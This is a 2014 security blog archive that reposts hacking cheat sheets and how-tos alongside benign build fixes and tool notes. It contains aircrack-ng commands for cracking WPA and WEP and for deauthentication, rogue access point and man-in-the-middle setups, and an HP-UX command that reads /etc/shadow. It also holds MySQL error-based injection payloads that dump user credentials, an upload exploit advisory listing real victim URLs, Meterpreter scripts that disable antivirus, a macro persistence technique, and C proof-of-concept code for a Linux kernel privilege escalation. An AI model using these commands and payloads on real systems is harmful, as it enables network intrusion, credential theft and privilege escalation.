Jun 28, 2014

CheatSheet: Nikto Cheat Sheet







Source: http://needsec.com/wp-content/uploads/2013/11/CheatSheetNikto.pdf

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

All of the Wireless hacking command step

Cracking WPA
airmon-ng start wlan0
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {disassociation attack}
aircrack-ng -0 -w (wordlist path) (caputure filename)

Cracking WEP with Connected Clients
airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {disassociation attack}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack}

Cracking WEP via a Client
airmon-ng start wlan0 (channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -2 -b (AP MAC) -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0
aireplay-ng -2 -r (replay cap file) mon0 {inject using cap file}
aircrack-ng -0 -z(PTW) -n 64(64bit) filename.cap

ARP amplification
airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 500 -q 8 -a (AP MAC) mon0
areplay-ng -5 -b (AP MAC) -h (OUR MAC) mon0
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k 255.255.255.255 -l 255.255.255.255 -y (FRAGMENT.xor) -w (filename.cap)
tcpdump -n -vvv -e -s0 -r (replay_dec.#####.cap)
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k (destination IP) -l (source IP) -y (FRAGMENT.xor) -w (filename.cap)
aireplay-ng -2 -r (filename.cap) mon0

Cracking WEP /w shared key AUTH
airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
~this will error out~aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack}
aireplay-ng -1 60 -e (ESSID) -y (sharedkeyfile) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication /w PRGA xor file}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack}
aircrack-ng -0 -z(PTW) -n 64(64bit) filename.cap

ENVIROMENT VARIABLE SETUP
cat filename
for var in $(cat filename); do echo export $var >> .bashrc; done
tail .bashrc

Cracking a Clientless WEP (FRAG AND KOREK)
{FRAG}
airmon-ng start wlan0 (channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 60 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
~aireplay-ng -5 (frag attack) -b (AP MAC) -h (OUR MAC) mon0
packetforge-ng -0 -a (APMAC) -h (OUR MAC) -l 255.255.255.255 -k 255.255.255.255 -y (fragment filename) -w filename.cap
tcpdump -n -vvv -e -s0 -r filename.cap {TEST}
aireplay-ng -2 -r filename.cap mon0

{KOREK}
~aireplay-ng -4 -b (AP MAC) -h (OUR MAC) mon0
tcpdump -s 0 -s -e -r replayfilename.cap
packetforge-ng -0 -a (APMAC) -h (OUR MAC) -l 255.255.255.255(source IP) -k 255.255.255.255(dest IP) -y (fragmentfilename xor) -w filename.cap
aireplay-ng -2 -r filename.cap mon0
aircrack-ng -0 filename.cap

Karmetasploit
airbase-ng -c (channel) -P -C 60 -e “FREE WiFi” -v mon0
ifconfig at0 up 10.0.0.1/24
mkdir -p /var/run/dhcpd
chown -R dhcpd:dhcpd /var/run/dhcpd
touch /var/lib/dhcp3/dhcpd.leases
cat dhcpd.conf
touch /tmp/dhcp.log
chown dhcpd:dhcpd /tmp/dhcp.log
dhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp.log at0
msfconsole -r /root/karma.rc

Bridge CTRL man in the middle SETUP
airebase-ng -c 3 -e “FREE WiFi” mon0
brctl addbr hacker(interface name)
brctl addif hacker eth0
brctl addif hacker at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig hacker 192.168.1.8 up
ifconfig hacker
echo 1 > /proc/sys/net/ipv4/ip_forward

pyrit DB attacks
pyrit eval
pyrit -i (wordlist) import_passwords
pyrit -e (essid) create_essid
pyrit batch
pyrit batch -r (capturefile) -b(AP MAC) attack_db

pyrit strip command
pyrit -r (capturefile) -o (capturefile output) strip

pyrit dictionary attack
pyrit -r (capturefile) -i (/pathtowordlist) -b (AP MAC) attack_passthrough

airgraph-ng
airgraph-ng -i filename.csv -g CAPR -o outputfilename.png
eog outputfilename.png
airgraph-ng -i filename.csv -g CPG -o outputfilename.png
eog outputfilename.png

airdecap-ng
airdecap-ng -b (vic ap) outputfilename.cap
wireshark outputfilename.cap
airdecap-ng -w (WEP KEY) (capturefile.cap)
wireshark capturefile-DEC.cap
airdecap-ng -e (ESSID VIC) -p (WPA PASSWORD) (capturefile.cap)
wireshark capturefile-dec.cap


Source: https://evilzone.org/security-tools/aircrack-ng-suite-cheatsheet/ 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: Detecting Intrusion




Download Link: https://8ack.de/dontpanic/linsacheatsheet.pdf

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 27, 2014

Howto: Mac OS X ADB Configuration

1. Plug the device to Mac OSX

2. In you device, change mode of USB to "Send images (PTP)". It will alert to you about USB Debugging to user.

3. Go to get your device id with "Apple logo"(Top left side) -> "About This Mac" -> "More Info..." -> "System Report" -> "USB" -> "USB Hi-Speed Bus" -> "Hub" -> <Your device> -> Get your vendor ID (in this case, my id is "0x1004").



4. Add into your android configure profile.
echo "0x1004" >> ~/.android/adb_usb.ini

5. In Mac OSX, Update device list
/adt-bundle-mac-x86_64-20140321/sdk/tools/android update adb 

6. In Mac OSX, restart the adb server
/adt-bundle-mac-x86_64-20140321/sdk/platform-tools/adb kill-server
/adt-bundle-mac-x86_64-20140321/sdk/platform-tools/adb start-server

7. Try to get the list of devices
/adt-bundle-mac-x86_64-20140321/sdk/platform-tools/adb devices

Done.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 26, 2014

Tools: Malcom - Malware Communication Analyzer

Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic. This comes handy when analyzing how certain malware species try to communicate with the outside world.
Malcom can help you:
  • detect central command and control (C&C) servers
  • understand peer-to-peer networks
  • observe DNS fast-flux infrastructures
  • quickly determine if a network artifact is 'known-bad'
The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network. Convert network traffic information to actionable intelligence faster.

Source: https://github.com/tomchop/malcom


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: phpMyAdmin Honeypot - A simple and effective phpmyadmin honeypot

[Requirements]
      You will need...

      1. A web server (preferably running the current version of Apache)

      2. The ability to change file permissions on the web server

      3. To know at least a little HTML and PHP

      4. About 30 minutes of free time

      5. For automated alert generation, access to a Log Manager / SIEM is recommended

[Installation]

Medium-Interaction Version:
      1. Upload the /phpmyadmin-interactive/ folder to the root of your web directory and change the folder name to /phpmyadmin/

      2. Change the permissions on /phpmyadmin/log.txt to 700 so that the file can be written to by the web user:
           $ chmod 700 log.txt

      3. Assure that all contents of the directory are owned by the 'web user' (www-data / apache / etc.)
           $ chown -R www-data:www-data /var/www/phpmyadmin/

      4. Add the following lines to your robots.txt file (or create one in the root of your web server) so that web crawlers *won't index the /phpmyadmin/ directory but users will find it:
           # Directories
           Disallow: /phpmyadmin/
           # Files
           Disallow: /phpmyadmin/index.php

      5. Change the name of the default log file (log.txt) and move it to a separate directory.
           Update the file location within the index.php, login.php, phpinfo.php, and master-config/index.php files.

      6. Modify the permitted credentials to 'acccess' the phpmyadmin landing page within login.php on the following line:
           if (preg_match("[USERNAME, PASSWORD]", $comma_delimited_list)) {

      7. Test to assure that access to each page is being logged to the 'log.txt' file.

      8. Parse the logs using the included Regular Expression (below) if you would like to integrate with your SIEM / Log Management solution.

      9. That's it, now just sit back and see how many flies you can catch!


Source: https://github.com/gfoss/phpmyadmin_honeypot

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: HP-UX 0day local privilege escalation

Suddenly I realized there are some “old” binaries (related to the functionality) present on the system:
-r-sr-xr-x   1 root       bin         920588 Feb 15  2007 /usr/bin/pppd
-r-sr-xr-x   1 root       bin          87136 Feb 15  2007 /usr/bin/pppoec
The pppd can’t be executed by unprivileged users. The pppoec has the following command line arguments:
pppoec -i interface-name [ -c config-file ][ -d debug-level ][ -l log-file ]
Interesting! Let ‘s think like a hacker! ;)
/usr/bin/pppoec -i xx1 -r 1 -c /etc/shadow -d 1 -l /tmp/loggg.txt


Source: http://blog.silentsignal.eu/2014/06/25/hp-ux-0day-local-privilege-escalation/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Hacking new error-based SQL Injection From Rdot Forum

This vector does not work on older versions. The maximum length of an error on the file mysys / my_error.c: 
/ * Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. * /
# define ERRMSGSIZE (512)

 

Today's agenda alternative error-based vectors. It is very important and urgent topic. One of them, now I would like to tell us more. I'll be brief, vector based on the type of data overflow error (not necessarily integer):
 
mysql> SELECT * 2 18446744073709551610;
ERROR 1,690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'

mysql> SELECT -1 * 9223372036854775808;
ERROR 1,690 (22003): BIGINT UNSIGNED value is out of range in '(- (1) * 9223372036854775808)'
 

In the query portion of the output error, but the error does not occur before the execution, as in:  

mysql> SELECT 123 abc d;
ERROR in 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd' at line 1

 

And at the time because of what can be done with the input data manipulation and display all that I would like to bring:
code:

mysql> SELECT 2 * (if ((SELECT * from (SELECT (version ())) s), 18446744073709551610, 18446744073709551610));  

ERROR 1,690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if ((select '5 .5' from dual), 18446744073709551610,18446744073709551610)) ' 
/ / Output: 452 characters

And even more:
mysql> SELECT 2 * if ((SELECT * from (select * from test.shop) as `` limit 1)> (SELECT * from test.shop limit 1) 18446744073709551610, 18446744073709551610); 

ERROR One thousand six hundred and ninety (22003): BIGINT UNSIGNED value is out of range in '(2 * if (((select `article`, `dealer`, `price` from (select `test`. `Shop`. `Article` AS `article `,` test `.` shop `.` dealer `AS` dealer `,` test `.` shop `.` price `AS` price `from` test `.` shop `) limit 1)> (select` test `.` shop `.` article `,` test `.` shop `.` dealer `,` test `.` shop `.` price `from` test `.` shop `limit 1)) 18446744073709551610.18446744073709551610) ) '

/ / Learn the names of the columns in the table

And even more:
 

mysql> SELECT 2 * if ((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) <(1,2,3,4,5,6,7,8,9,0 , 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 , 6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610);

ERROR 1,690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if (((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1) <(1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))'

/ / Output the data from all the columns at once


At Fork MariaDB in error podzaprosy not vyvodâtsâ:
Code:

mysql> SELECT * 2 (if ((SELECT * FROM (SELECT (version ())) s), 18446744073709551610, 18446744073709551610))
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if ((select #), 18446744073709551610,18446744073709551610))'

Decision (s Simplify and small modifikaciej)

mysql> SELECT (and IS NOT NULL) - 9223372036854775808 FROM (SELECT (version ()) i) a;
ERROR 1690 (22003): BIGINT value is out of range in '(('5 .5-MariaDB' is not null) - (9223372036854775808)) '


/ / Output: 475 characters
 


Slightly shortened requests (extra braces removed, replaced representation of the number) and added a useful symbol in the derivation:

Displays information
SELECT 2 * (if ((SELECT * from (SELECT (version ())) s), 18446744073709551610, 18446744073709551610))

=
 select 1E308 * if ((select * from (select version ()) x), 2,2)
 

SELECT (i IS NOT NULL) - 9223372036854775808 FROM (SELECT (version ()) i) a
=
select if (x, 2,2) * 1E308 from (select version () x) y
(need to check on MariaDB!)

Know the names of the columns in the table
SELECT 2 * if ((SELECT * from (select * from test.shop) as `` limit 1)> (SELECT * from test.shop limit 1) 18446744073709551610, 18446744073709551610)
=
select 1E308 * if ((select * from (select * from mysql.user) `` limit 1)> (select * from mysql.user limit 1), 2,2)

 

Output from all columns:  
SELECT 2 * if ((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) <(1,2,3,4,5,6,7,8,9,0,1 , 2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9,0,1,2,3,4,5,6 , 7,8,9,0,1,2), 18446744073709551610, 18446744073709551610)
=
select 1E308 * if ((select * from (select * from mysql.user LIMIT 1) `` limit 1) <(select * from mysql.user limit 0), 2,2)
 

And if you want only certain columns, then we can get a clear conclusion:  

select 1E308 * if ((select user | | host | | password | | file_priv from (select * from mysql.user LIMIT 1) a limit 1), 2,2)
+ Bonus: know the number of columns in the table 
select 1E308 * if ((select * from mysql.user limit 1)> (select 1), 2,2)


SELECT (i IS NOT NULL) - 9223372036854775808 FROM (SELECT (version ()) i) a
that it gives the maximum number of characters (475). We can not improve (probably).
The smaller characters at the beginning and at the end of the larger, the better;
select 1E308 * if ((select user | | host | | password | | file_priv from (select * from mysql.user LIMIT 1) a limit 1), 2,2);
=>
select 2 * if ((select user | host | password | file_priv from (select * from mysql.user LIMIT 1) a limit 1), 1e308, 0);
A little bonus from this step

 
mysql> select (select * from mysql.user) = 1;
mysql> select (select * from mysql.user) in (1);

ERROR in 1241 (21000): Operand should contain 42 column (s)
 


1E308 is not HEX, numbers that the application of certain operations beyond the borders of its type (DOUBLE, BIGINT, BIGINT UNSIGNED, DECIMAL). 

Source: https://rdot.org/forum/showthread.php?t=3167 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 25, 2014

Howto: FIX "libtool: Version mismatch error."

1.  make maintainer-clean
2. autoreconf --force --install 
3. ./configure
4. make
5. make install
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Fix Glib Compile Error in CentOS

If you got 
"*** You must have either have gettext support in your C library, or use the
*** GNU gettext library. (http://www.gnu.org/software/gettext/gettext.html"

fix with 
export PATH=$PATH:/usr/local/bin

and try to use your autogen.sh again
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 24, 2014

Error SQL Injection for get database user

sql > select!x-~0.FROM(select+user()x)f; 
BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'


From Nic & Phitchayapong


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Remove PPSync(Application that you got from Jailbreak iOS 7.1)

1. Go to Cydia
2. Go to Manage > Sources > Edit > Add.
3. Add Repository http://cydia.angelxwind.net/
4. Search and install PPSync Remover
Screen Shot 2557-06-24 at 11.56.58 AM
5. Remove PPStore from Cydia
6. After that reboot
7. Go to Settings General Profiles delete 25pp certificate. Done.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

jQuery PHP Arbitrary Upload

[+] Arbitrary Upload on jQuery/PHP
[+] Date: 23/06/2014

[+] Risk: High

[+] CWE Number : CWE-264

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://rafaelcouto.com.br/upload-dinamico-com-php-jquery/#sthash.uVv21WU9.dpuf

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Linux

[+] Dork: "Upload dinâmico com jQuery/PHP"

[+] Exploit : http://host/patch/upload.php

[+] PoC:

http://www.agendXavisual.com/php/uploads_multiplos_1_modific/upload.php
http://www.agenXdavisual.com/php/uploads_multiplos_1_modific/uploads/e3b334538b7fc18a74286412bc388010.txt

http://lagodoy.nXo-ip.biz/projetos/lagodoy/upload_dinamico/upload.php
http://lagodoyX.no-ip.biz/projetos/lagodoy/upload_dinamico/uploads/03cd4c9a05c8b2a4b2ede68a7b4a5fdb.txt

http://estatisXtica.br/caem/mostra2013/formularios/upload_comprovante.php
http://estatiXstica.br/caem/mostra2013/formularios/uploads/573437f23846bacf89c7e37193cfd224.txt


Source: http://cxsecurity.com/issue/WLB-2014060131


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Infrastructure with Python

awscli THE command line interface if you’re using AWS. Really nice documentation on how to talk to the different AWS services. I use this a lot as a glue library. For example, once Jenkins runs tests on a project, we tar.gz an artifact and use awscli to upload it to S3.

boto

If you’re using AWS and need to get state or resources at runtime boto is what you want. The API is large, but well documented and composed.
botocore is a smaller low-level alternative, but I don’t care much about size when boto’s docs are good. botocore is the foundation for awscli.

Fabric

Fabric is my go-to tool for remote execution. PyChef fetches the hosts I need and passes them to Fabric, which takes care of running any commands. This is a popular lib that has been around for a while; a lot of well-tested features.

Flask

A web framework? Yes. A lot of the headache of managing infrastructure can be alleviated by having good visibility on what your system is doing. Flask is great for building small simple dashboards to present information on various subsystems.

PyChef

A Python API for interacting with your Chef server. I use this in our deployment and monitoring tooling. When I want to deploy an app, I use PyChef to search for the nodes that the app is currently on and use Fabric to deploy to those hosts.

python-simple-hipchat

My team uses Hipchat. We have rooms set up that alert us to problems across our infrastructure. This library is simple and just works.

requests

Lots of my infrastucture work is tying different services together. If the data I need is behind a HTTP API, requests is usually the easiest way to get it. The context here is important.
If there is an API wrapper library already written, I’ll use it if I’ll be using several different endpoints. If I’m only hitting a few endpoints or they are simple, I find it’s usually easier to just use requests instead.

supervisor

I’m not a fan of writing init scripts in the archaic init.d syntax, and Upstart limits you to Ubuntu. supervisor makes it easy to run Python code inside virtual environments. Sold.

troposphere

troposphere allows you to describe AWS CloudFormation stacks in Python. You can then generate your JSON. The main advantage here for me was keeping my stack definitions DRY. Instead of doing the same thing over and over again in JSON, I just define it once in Python and import it when I need it.

uwsgi

When I need a application server, I reach for uwsgi. It’s simple, highly configurable and has built in support for virtualenvs. It also works well with supervisor and nginx (my proxy of choice). There are a lot of alternatives to uwsgi, but I don’t need async so they aren’t very compelling.

Source: http://dustinrcollins.com/infrastructure-with-python


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Linux I/O



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: iOS Jailbreak 7.1.x

  1. Make sure you have iTunes installed.
  2. Edit your iPhone's date to June 2, 2014
  3. Open the PanGu.exe file(Download From http://dl.pangu.25pp.com/jb/Pangu_v1.0.exe)
  4. Click the black button to the right (also UNCHECK THE CHECKMARK where you see random characters and the "PP")
  5. As soon as the "brush stroke" loading bar fills to 20%, the PanGu app will appear on your phone
  6. Tap it
  7. Select Continue
  8. It will fill the loading brush stroke until 80% and your iTunes will open (it will only open IF you have iTunesHelper.exe on your Windows Taskbar)
  9. Close iTunes
  10. Your device will reboot
  11. When it opens again, wait for the brush stroke to complete to 100%
  12. Your device will reboot once more
  13. The process will be finished 100%
  14. The PanGu app will be replaced with Cydia
  15. Do your usual stuff by opening Cydia and continue with what you want to install by then.
  16. For precautionary measures, install Complete PPSync Remover (on http://cydia.angelxwind.net repo) because even though you uncheck the "PP" on step 4, it installs it anyway (internally without the app showing)

Source: http://lifehacker.com/ios-7-1-1-untethered-jailbreak-released-1594866825



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

IRMA - Incident Response Malware Analysis

IRMA intends to be an open-source platform designed to help identifying and analyzing malicious files.
However, today's defense is not only about learning about a file, but it is also getting a fine overview of the incident you dealt with: where / when a malicious file has been seen, who submitted a hash, where a hash has been noticed, which anti-virus detects it, ...
An important value with IRMA comes from you keep control over where goes / who gets your data. Once you install IRMA on your network, your data stays on your network.
Each submitted files is analyzed in various ways. For now, we focus our efforts on multiple anti-virus engines, but we are working on other "probes" (feel free to submit your own).



Source: http://irma.quarkslab.com/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 23, 2014

Howto: Blocking Installation of Baidu Application

1. Create block.bat

2. Edit block.bat with
echo  NoBaidu  >  "%ProgramFiles%\Baidu"
echo  NoBaidu  >  "%ProgramFiles%\Baidu Security"
echo  NoBaidu  >  "%ProgramFiles%\Hao123"

echo  NoBaidu  >  "%ProgramFiles(x86)%\Baidu"
echo  NoBaidu  >  "%ProgramFiles(x86)%\Baidu Security"
echo  NoBaidu  >  "%ProgramFiles(x86)%\Hao123"

echo  NoBaidu  >  "%AppData%\Baidu"
echo  NoBaidu  >  "%AppData%\Baidu Security"
echo  NoBaidu  >  "%AppData%\Hao123"

echo  NoBaidu  >  "%LocalAppData%\Baidu"
echo  NoBaidu  >  "%LocalAppData%\Baidu Security"
echo  NoBaidu  >  "%LocalAppData%\Hao123"

echo  NoBaidu  >  "%ProgramData%\Baidu"
echo  NoBaidu  >  "%ProgramData%\Baidu Security"
echo  NoBaidu  >  "%ProgramData%\Hao123" 


3. Save

4. Run block.bat

Source:: http://pantip.com/topic/32022860

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Best Post Exploitation In Metasploit

getgui

The 'getgui' script is used to enable RDP on a target system if it is disabled.

getcountermeasure

The 'getcountermeasure' script checks the security configuration on the victims system and can disable other security measures such as A/V, Firewall, and much more.

checkvm

The 'checkvm' script, as its name suggests, checks to see if you exploited a virtual machine. This information can be very useful.

get_local_subnets

The 'get_local_subnets' script is used to get the local subnet mask of a victim. This can be very useful information to have for pivoting.

gettelnet

The 'gettelnet' script is used to enable telnet on the victim if it is disabled.

hostsedit

The 'hostsedit' Meterpreter script is for adding entries to the Windows hosts file. Since Windows will check the hosts file first instead of the configured DNS server, it will assist in diverting traffic to a fake entry or entries. Either a single entry can be provided or a series of entries can be provided with a file containing one entry per line.

killav

The 'killav' script can be used to disable most antivirus programs running as a service on a target.

remotewinenum

The 'remotewinenum' script will enumerate system information through wmic on victim. Make note of where the logs are stored.

scraper

The 'scraper' script can grab even more system information, including the entire registry.

winenum

The 'winenum' script makes for a very detailed windows enumeration tool. It dumps tokens, hashes and much more. 

Source: http://www.offensive-security.com/metasploit-unleashed/Existing_Scripts


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 22, 2014

Howto: Use Old USB Drive as RAM in Windows

Step 1: Insert your 4GB or 8GB Pendrive.

Step 2: Now goto My Computers and Right Click on your Pendrive to Select Properties.
Step 3: Click on Readyboost Tab, Now wait couple of seconds so that it analyzes your USBDrive, Next you will see something like below Picture
Use Pendrive as RAM in Windows
Step 4: Click on Use this Device, Select the number of MBs you want to use out of total space, Then Click on Apply

Step 6: Next you will see Readyboost is Configuring your Cache, When its Done, Just reboot your PC to Feel the Difference



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Abusing Powershell Profiles

you can create any automatic customization you need and save it in profile.ps1 in the $PsHome directory (C:\Windows\System32\WindowsPowershell\v1.0\). If that file exists, it executes the contents when powershell.exe is executed. This is Microsoft’s attempt to make the Powershell console easy to customize.

This can also be used for malicious purposes. For example, an attacker can create or override profile.ps1 with malicious code and force powershell.exe to execute in the background.
The macro for this can be found on my Github here:
https://github.com/enigma0x3/PowershellProfile

The workflow goes like this:
1. The document is opened and the macro is executed.
2. Upon execution, the macro creates a file called “cookie.txt” in C:\Users\Default\AppData\Roaming\Microsoft\Cookies\.
3. Once created, it writes a wrapper that executes powershell.exe silently, changes the extension from .txt to .vbs and then sets the file attributes to “hidden”.
2

It is just a vbs wrapper that executes Powershell and hides everything from the user. With cookie.vbs (containing a silent powershell launcher) created, it creates a new profile ps1 in C:\Windows\System32\WindowsPowershell\v1.0\.

4. My example just uses Powershell to execute calc.exe, but you can put any malicious Powershell script in there. Another thing to note is that it sets the attributes of Profile.ps1 to hidden as well.
3

5
 5. As many of you know, the code in profile.ps1 will execute when Powershell is launched. At this point, we have malicious code in profile.ps1 and a vbscript that executes Powershell silently. The last part of this attack is the persistence portion. The malicious macro then creates a registry key in HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load and points it to cookie.vbs in the Default profile.

4
6. When the user logs in, the registry key executes cookie.vbs which executes Powershell.exe silently. Because we have calc.exe (or malicious code) in Profile.ps1, it is executed as well….silently of course.
 

Source: http://enigma0x3.wordpress.com/2014/06/16/abusing-powershell-profiles/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: kali-cleaner - Little cleaner script for Kali linux

Little cleaner script for Kali linux. Clean apt cache. Removing old config files. Removing old kernels. Emptying every trashes.
You can save script on Desktop. Make it executable and clean kali linux.

Source: https://github.com/MasterButcher/kali-cleaner


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

News: CVE-2014-4014: Linux Kernel Local Privilege Escalation "exploitation" by Vitaly Nikolenko

The CLONE_NEWUSER namespace was introduced in Linux 2.6.23 and completed in Linux 3.8 (and starting from 3.8, unprivileged processes can create user namespaces). It is used to isolate the user and group ID number spaces, i.e., a process's user and group IDs can be different inside and outside a user namespace. For example, a normal (unprivileged) process can create a namespace in which it has a uid of 0.
Hence, a mapping from the user and group IDs inside a user namespace to a corresponding set of user and group IDs outside the namespace is required. This mapping allows the OS to perform the appropriate permission checks when a process in a user namespace performs operations that affect the system outside that namespace, e.g., file system access. However, a number of Linux filesystems are not yet "fully" user-namespace aware.
The bug is in incorrect use of the inode_capable() that determines capabilities of the user or group. Let's take a look at the inode_change_ok() function that uses inode_capable() to check that the caller has sufficient privileges to perform chown, chgrp and chmod operations:

        /* Make sure a caller can chmod. */
        if (ia_valid & ATTR_MODE) {
                if (!inode_owner_or_capable(inode))                          (1)
                        return -EPERM;
                /* Also check the setgid bit! */
                if (!in_group_p((ia_valid & ATTR_GID) ? attr->ia_gid :
                                inode->i_gid) &&
                    !inode_capable(inode, CAP_FSETID))                       (2)
                        attr->ia_mode &= ~S_ISGID;
        }
At (2), the inode_capable() is called with CAP_FSETID. The inode_capable() is then supposed to check whether the caller is allowed to perform the chmod operation based on the mapping to uid and gid outside the namespace:
bool inode_capable(const struct inode *inode, int cap)
{
        struct user_namespace *ns = current_user_ns();

        return ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid);    (3)
}
However, as can be seen at (3), the check is only performed for inode->i_uid (and not for inode->i_gid). What that means is that if we own a file as a non-privileged user (outside the namespace) with gid set to 0 (how can that happen?), we can set the setgid bit on that file due to the missing inode->i_guid check above. But yes, we do need to own (i.e., our uid) the file in the first place because of the inode_owner_or_capable() check at (1):
bool inode_owner_or_capable(const struct inode *inode)
{
        if (uid_eq(current_fsuid(), inode->i_uid))
                return true;
        if (inode_capable(inode, CAP_FOWNER))
                return true;
        return false;
}
The following PoC demonstrates the exploitation technique.

PoC

For this example, I'll be using Ubuntu 14.04:
vnik$ uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 
First, let's assume there is a file owned by us (vnik) with gid of 0:
vnik$ id
uid=1001(vnik) gid=1001(vnik) groups=1001(vnik)

vnik$ ls -al test 
-rw-rw-r-- 1 vnik root 0 Jun 19 13:59 test
So, the gid is root and there are no setuid or setgid bits set. Let's create a user namespace where our user is mapped to root.
#define _GNU_SOURCE
#include <sys/wait.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <assert.h>

#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];

struct args {
    int pipe_fd[2];
    char *file_path;
};

static int child(void *arg) {
    struct args *f_args = (struct args *)arg;
    char c;

    // close stdout
    close(f_args->pipe_fd[1]); 

    assert(read(f_args->pipe_fd[0], &c, 1) == 0);

    // set the setgid bit
    chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);          (5)

    return 0;
}

int main(int argc, char *argv[]) {
    int fd;
    pid_t pid;
    char mapping[1024];
    char map_file[PATH_MAX];
    struct args f_args;

    assert(argc == 2);

    f_args.file_path = argv[1];
    // create a pipe for synching the child and parent
    assert(pipe(f_args.pipe_fd) != -1);

    pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);     (3)
    assert(pid != -1);

    // get the current uid outside the namespace
    snprintf(mapping, 1024, "0 %d 1\n", getuid()); 

    // update uid and gid maps in the child
    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
    fd = open(map_file, O_RDWR); assert(fd != -1);

    assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));                     (4)
    close(f_args.pipe_fd[1]);

    assert (waitpid(pid, NULL, 0) != -1);
}
The above code creates a user namespace (3) with a mapping (4) for the current user (outside the namespace) to uid 0 (inside the namespace). The child process within the new namespace then sets the setgid bit (5) on the supplied file. Since there is no check for kgid_has_mapping(ns, inode->i_gid) in inode_capable(), we can set the setgid bit on a file with an arbitrary gid value (even if we don't belong to that group outside the namespace). The above PoC can be downloaded from here.
vnik$ gcc poc.c -o poc
Let's now create a simple shell launcher that we'll use to overwrite the test file:
